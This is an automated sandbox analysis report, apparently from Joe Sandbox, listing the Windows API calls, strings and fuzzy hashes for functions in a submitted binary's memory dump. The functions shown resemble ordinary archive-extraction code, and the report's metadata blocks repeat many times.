Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6b3bdbb89a7b7b7311d6a8ea5c7a62bf1e49ff88192942090cf337bd170c9369
Instruction ID: b481695a6a3a269e01a9c7d1f877c2da5a2ebdc2c9db720e568dc34959b98162
Opcode Fuzzy Hash: 6b3bdbb89a7b7b7311d6a8ea5c7a62bf1e49ff88192942090cf337bd170c9369
Instruction Fuzzy Hash: 71A001A62AD143BC31087292BD5BE3F0A7CE4C6BA27308A1EB40B95899A99959495831

Function 005ADAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6f2c3db789c4b07d9805c039a36f04db8fd015c14cf3f0474b0e41dd43dcee9a
Instruction ID: b481695a6a3a269e01a9c7d1f877c2da5a2ebdc2c9db720e568dc34959b98162
Opcode Fuzzy Hash: 6f2c3db789c4b07d9805c039a36f04db8fd015c14cf3f0474b0e41dd43dcee9a
Instruction Fuzzy Hash: 71A001A62AD143BC31087292BD5BE3F0A7CE4C6BA27308A1EB40B95899A99959495831

Function 005ADAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADAB2

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4ff9d1ffbb3cd3d32fb85994f15ba675106e719a0c5f5315a5a19dcc8c891326
Instruction ID: 4e6c49486d21bbf956bd2890eb59aa461d87a18769d9696e8443690a5253f2e3
Opcode Fuzzy Hash: 4ff9d1ffbb3cd3d32fb85994f15ba675106e719a0c5f5315a5a19dcc8c891326
Instruction Fuzzy Hash: B1A011A22AC0023C3008B282BC0BE3F0A3CF0C2B223308A0EB00BA0888A88808080830

Function 005ADBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 75cf9edae0334b5e459976e98a4be215273b762b69805b46a5dec024db6f0347
Instruction ID: c695c39944de4635dd9faee6b71a3a63235271a583efc3851a6f416a00f56bae
Opcode Fuzzy Hash: 75cf9edae0334b5e459976e98a4be215273b762b69805b46a5dec024db6f0347
Instruction Fuzzy Hash: 77A001AA2AD10BBC310872916D5BE7F0B3CF4CAFA1731891EB50B95881AA905C595832

Function 005ADC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADC36

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d8126e1ee56940b117841f159a292aaae92c4dbcaf1d190c93a85fcf1fc92ea4
Instruction ID: 8554e4e4964f7f1ce9951d5651bb9f6a1629b785414c4613b6645bf982c78cba
Opcode Fuzzy Hash: d8126e1ee56940b117841f159a292aaae92c4dbcaf1d190c93a85fcf1fc92ea4
Instruction Fuzzy Hash: 97A0029956D1077C310C71516D57D7F0A3CE4C5F617704D1DB5079545155805C455431

Function 005ADC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADC36

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 83d6c299b03b940e94ef51a200c149213c07b13752735546ae207296e3a3f539
Instruction ID: 8554e4e4964f7f1ce9951d5651bb9f6a1629b785414c4613b6645bf982c78cba
Opcode Fuzzy Hash: 83d6c299b03b940e94ef51a200c149213c07b13752735546ae207296e3a3f539
Instruction Fuzzy Hash: 97A0029956D1077C310C71516D57D7F0A3CE4C5F617704D1DB5079545155805C455431

Function 005ADC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bc018e1f2e763117e7c8cbea143cf460f7ac35527427f1edecce7618e9a1149b
Instruction ID: c695c39944de4635dd9faee6b71a3a63235271a583efc3851a6f416a00f56bae
Opcode Fuzzy Hash: bc018e1f2e763117e7c8cbea143cf460f7ac35527427f1edecce7618e9a1149b
Instruction Fuzzy Hash: 77A001AA2AD10BBC310872916D5BE7F0B3CF4CAFA1731891EB50B95881AA905C595832

Function 005ADC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7365ca6fe1e00dd9d75b0388aa6170e1bddc53eab764c0ac0208b385659be4e3
Instruction ID: c695c39944de4635dd9faee6b71a3a63235271a583efc3851a6f416a00f56bae
Opcode Fuzzy Hash: 7365ca6fe1e00dd9d75b0388aa6170e1bddc53eab764c0ac0208b385659be4e3
Instruction Fuzzy Hash: 77A001AA2AD10BBC310872916D5BE7F0B3CF4CAFA1731891EB50B95881AA905C595832

Function 005ADC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5

Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8fb210e389906c9cdb9ecc317be3533b7251999e27d69cbd0ccc0422538c6864
Instruction ID: c695c39944de4635dd9faee6b71a3a63235271a583efc3851a6f416a00f56bae
Opcode Fuzzy Hash: 8fb210e389906c9cdb9ecc317be3533b7251999e27d69cbd0ccc0422538c6864
Instruction Fuzzy Hash: 77A001AA2AD10BBC310872916D5BE7F0B3CF4CAFA1731891EB50B95881AA905C595832

Function 005AA322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,005AA587,C:\Users\user\Desktop,00000000,005D946A,00000006), ref: 005AA326

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: efa75f6e2adf078cbba050524c0f66e63a96a9570a810cd9b271b1cbb07c669e
Instruction ID: 7e04b141ca18e2f57998f1eb6453df66e6f0d2a0f0aea555d1d2ea91677ac79e
Opcode Fuzzy Hash: efa75f6e2adf078cbba050524c0f66e63a96a9570a810cd9b271b1cbb07c669e
Instruction Fuzzy Hash: EAA0123019400A5E8B000B30CC09C1576505770702F00D6207002C00A0CB30C818F500

Function 005996D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,0059968F,?,?,?,?,005C1FA1,000000FF), ref: 005996EB

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 62bbba17b3194b68552dd78d762e196da808b150eceede53566ac391eded7a7f
Instruction ID: 9ce88d8d37a10b79a4560bdac6f2d49781a545871d1d00cee180d16b2e7fd922
Opcode Fuzzy Hash: 62bbba17b3194b68552dd78d762e196da808b150eceede53566ac391eded7a7f
Instruction Fuzzy Hash: 30F05E31556B058FDF308B28D688B92BBE8BB16725F049B1E90E7435E09761684D9B00

Non-executed Functions

Function 005AB8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 005AB971
EndDialog.USER32(?,00000006), ref: 005AB984
GetDlgItem.USER32(?,0000006C), ref: 005AB9A0
SetFocus.USER32(00000000), ref: 005AB9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 005AB9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 005ABA18
FindFirstFileW.KERNEL32(?,?), ref: 005ABA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005ABA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 005ABA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 005ABA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 005ABA94
_swprintf.LIBCMT ref: 005ABAC4

Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 005ABAD7
FindClose.KERNEL32(00000000), ref: 005ABADE
_swprintf.LIBCMT ref: 005ABB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 005ABB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 005ABB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 005ABB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 005ABB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 005ABBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 005ABBC9
_swprintf.LIBCMT ref: 005ABBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 005ABC08
_swprintf.LIBCMT ref: 005ABC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 005ABC6F

Part of subcall function 005AA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 005AA662
Part of subcall function 005AA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,005CE600,?,?), ref: 005AA6B1

Strings

REPLACEFILEDLG, xrefs: 005AB907
%s %s %s, xrefs: 005ABAB2, 005ABBE7
%s %s, xrefs: 005ABB29, 005ABC4E

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 468335c66a4aaf8263024f1aaf112a764c4ed5459562b8552203de72af5c6d9f
Instruction ID: cc354cb85e57747c85b85826d00b7a277a169f2248e4afaa389ff18391bc404c
Opcode Fuzzy Hash: 468335c66a4aaf8263024f1aaf112a764c4ed5459562b8552203de72af5c6d9f
Instruction Fuzzy Hash: 3C9161B2144349BFE6219BA0DD49FFF7BACFB8A700F044819B749D2091D7759A08DB62

Function 0059718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00597191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 005972F1
CloseHandle.KERNEL32(00000000), ref: 00597301

Part of subcall function 00597BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00597C04
Part of subcall function 00597BF5: GetLastError.KERNEL32 ref: 00597C4A
Part of subcall function 00597BF5: CloseHandle.KERNEL32(?), ref: 00597C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0059730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0059741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00597446
CloseHandle.KERNEL32(?), ref: 00597457
GetLastError.KERNEL32 ref: 00597467
RemoveDirectoryW.KERNEL32(?), ref: 005974B3
DeleteFileW.KERNEL32(?), ref: 005974DB

Strings

UNC\, xrefs: 0059723C
SeCreateSymbolicLinkPrivilege, xrefs: 005971BC
SeRestorePrivilege, xrefs: 005971B2
\??\, xrefs: 00597217

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: cdd3457b52b2cd504a0fe245d2905db39518ce9600fecc4b9133fa8060354d51
Instruction ID: 39c548e90680c37f85d916302fe307ab5bf4eb5e7d020662ae3a3dd29629e397
Opcode Fuzzy Hash: cdd3457b52b2cd504a0fe245d2905db39518ce9600fecc4b9133fa8060354d51
Instruction Fuzzy Hash: 22B1B271914219AEDF20DB64DC49BEE7FB8BF48300F04456AF949E7142E734AA49CB61

Function 00593281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0059328A
_memcmp.LIBVCRUNTIME ref: 00593377

Strings

CMT, xrefs: 00593990
hc%u, xrefs: 0059367B
h%u, xrefs: 0059362D

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 366b57a6c821c10f36bcd339333d4b852035dc151d4683d05d2aa77f73269262
Instruction ID: 3013d01f864d5728fc2d905a84307476125366fc066fcd62a30e3d34f1a11552
Opcode Fuzzy Hash: 366b57a6c821c10f36bcd339333d4b852035dc151d4683d05d2aa77f73269262
Instruction Fuzzy Hash: 7632A2715102859FDF14DF74C899AEA3FA5BF55300F44447EFD8A8B282DB74AA48CB60

Function 005BD00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 005BD154

Strings

1#IND, xrefs: 005BE34C
1#QNAN, xrefs: 005BE35A
1#INF, xrefs: 005BE361
1#SNAN, xrefs: 005BE353

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 0a1a0996cc0784b28ef8eed9e81a365f7d55e4ebdfbca9432077ca5fbe2bbdf7
Instruction ID: 1ee24605d6b99a9c5c2af8c85bff211fe02232bd1ef5b729c4fc61781f932618
Opcode Fuzzy Hash: 0a1a0996cc0784b28ef8eed9e81a365f7d55e4ebdfbca9432077ca5fbe2bbdf7
Instruction Fuzzy Hash: 68C23772E086298FDB258F289D457E9BBB5FB84305F1845EAD80DE7240E774BE818F50

Function 005927E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 005927F1
_strlen.LIBCMT ref: 00592D7F

Part of subcall function 005A137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0059B652,00000000,?,?,?,00010406), ref: 005A1396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00592EE0

Strings

CMT, xrefs: 00592F13

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
